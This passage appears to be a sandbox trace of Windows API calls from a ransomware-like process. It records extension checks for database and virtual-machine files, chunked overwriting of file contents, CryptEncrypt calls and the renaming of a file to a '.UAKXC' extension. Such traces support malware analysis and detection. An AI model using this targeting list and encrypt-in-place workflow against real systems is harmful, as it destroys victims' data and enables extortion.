(lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".abs") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".abx") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".accdw") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".adn") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".db2") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".fm5") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".hjt") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".icg") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".icr") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".kdb") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".lut") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".maw") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".mdn") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".mdt") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".vdi") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".vhd") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".vmdk") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".pvm") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".vmem") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".vmsn") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".vmsd") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".nvram") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".vmx") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".raw") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".qcow2") returned 0x0 [0151.088] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".subvol") returned 0x0 [0151.088] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".bin") returned 0x0 [0151.088] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".vsv") returned 0x0 [0151.088] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".avhd") returned 0x0 [0151.088] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".vmrs") returned 0x0 [0151.088] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".vhdx") returned 0x0 [0151.088] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".avdx") returned 0x0 [0151.088] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".vmcx") returned 0x0 [0151.088] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".iso") returned 0x0 [0151.088] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.088] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0151.364] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0151.364] SetEndOfFile (hFile=0x6ec) returned 1 [0151.364] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.365] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x169cc0, lpNumberOfBytesRead=0x373fc80, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc80*=0x169cc0, lpOverlapped=0x0) returned 1 [0153.782] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xffe96340, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.782] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x169cc0, lpNumberOfBytesWritten=0x373fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc2c*=0x169cc0, lpOverlapped=0x0) returned 1 [0153.789] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x169cc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.789] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x169cc0, lpNumberOfBytesRead=0x373fc80, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc80*=0x169cc0, lpOverlapped=0x0) returned 1 [0154.367] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xffe96340, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0154.367] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x169cc0, lpNumberOfBytesWritten=0x373fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc2c*=0x169cc0, lpOverlapped=0x0) returned 1 [0154.386] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x169cc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.386] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x169cc0, lpNumberOfBytesRead=0x373fc80, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc80*=0x169cc0, lpOverlapped=0x0) returned 1 [0154.634] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xffe96340, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0154.634] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x169cc0, lpNumberOfBytesWritten=0x373fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc2c*=0x169cc0, lpOverlapped=0x0) returned 1 [0154.654] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x169cc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.654] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x169cc0, lpNumberOfBytesRead=0x373fc80, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc80*=0x169cc0, lpOverlapped=0x0) returned 1 [0154.840] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xffe96340, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0154.840] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x169cc0, lpNumberOfBytesWritten=0x373fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc2c*=0x169cc0, lpOverlapped=0x0) returned 1 [0154.847] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x169cc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.847] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x169cc0, lpNumberOfBytesRead=0x373fc80, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc80*=0x169cc0, lpOverlapped=0x0) returned 1 [0155.046] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xffe96340, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.046] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x169cc0, lpNumberOfBytesWritten=0x373fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc2c*=0x169cc0, lpOverlapped=0x0) returned 1 [0155.053] CloseHandle (hObject=0x6ec) returned 1 [0157.645] GetProcessHeap () returned 0xea0000 [0157.645] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0157.645] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" [0157.645] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.UAKXC" [0157.646] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.uakxc")) returned 1 [0157.647] GetProcessHeap () returned 0xea0000 [0157.647] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0157.647] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5968 | out: hHeap=0xea0000) returned 1 [0157.647] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeacb8 | out: hHeap=0xea0000) returned 1 [0157.647] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0157.647] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0157.647] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0157.648] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 0x2020 [0157.649] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec [0157.649] GetLastError () returned 0x0 [0157.649] GetFileSizeEx (in: hFile=0x6ec, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=1800) returned 1 [0157.649] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".4dd") returned 0x0 [0157.649] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".4dl") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".accdb") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".accdc") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".accde") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".accdr") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".accdt") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".accft") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".adb") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".ade") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".adf") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".adp") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".arc") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".ora") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".alf") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".ask") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".btr") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".bdf") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".cat") returned 0x0 [0157.650] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".cdb") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".ckp") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".cma") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".cpd") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dacpac") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dad") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dadiagrams") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".daschema") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".db") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".db-shm") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".db-wal") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".db3") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dbc") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dbf") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dbs") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dbt") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dbv") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dbx") returned 0x0 [0157.651] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dcb") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dct") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dcx") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".ddl") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dlis") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dp1") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dqy") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dsk") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dsn") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dtsx") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".dxl") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".eco") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".ecx") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".edb") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".epim") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".exb") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".fcd") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".fdb") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".fic") returned 0x0 [0157.652] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".fmp") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".fmp12") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".fmpsl") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".fol") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".fp3") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".fp4") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".fp5") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".fp7") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".fpt") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".frm") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".gdb") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".grdb") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".gwi") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".hdb") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".his") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".ib") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".idb") returned 0x0 [0157.653] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".ihx") returned 0x0 [0157.654] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".itdb") returned 0x0 [0157.654] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".itw") returned 0x0 [0157.654] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".jet") returned 0x0 [0157.654] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".jtx") returned 0x0 [0157.654] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".kdb") returned 0x0 [0157.654] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".kexi") returned 0x0 [0157.654] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".kexic") returned 0x0 [0157.654] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".kexis") returned 0x0 [0157.654] StrStrIW 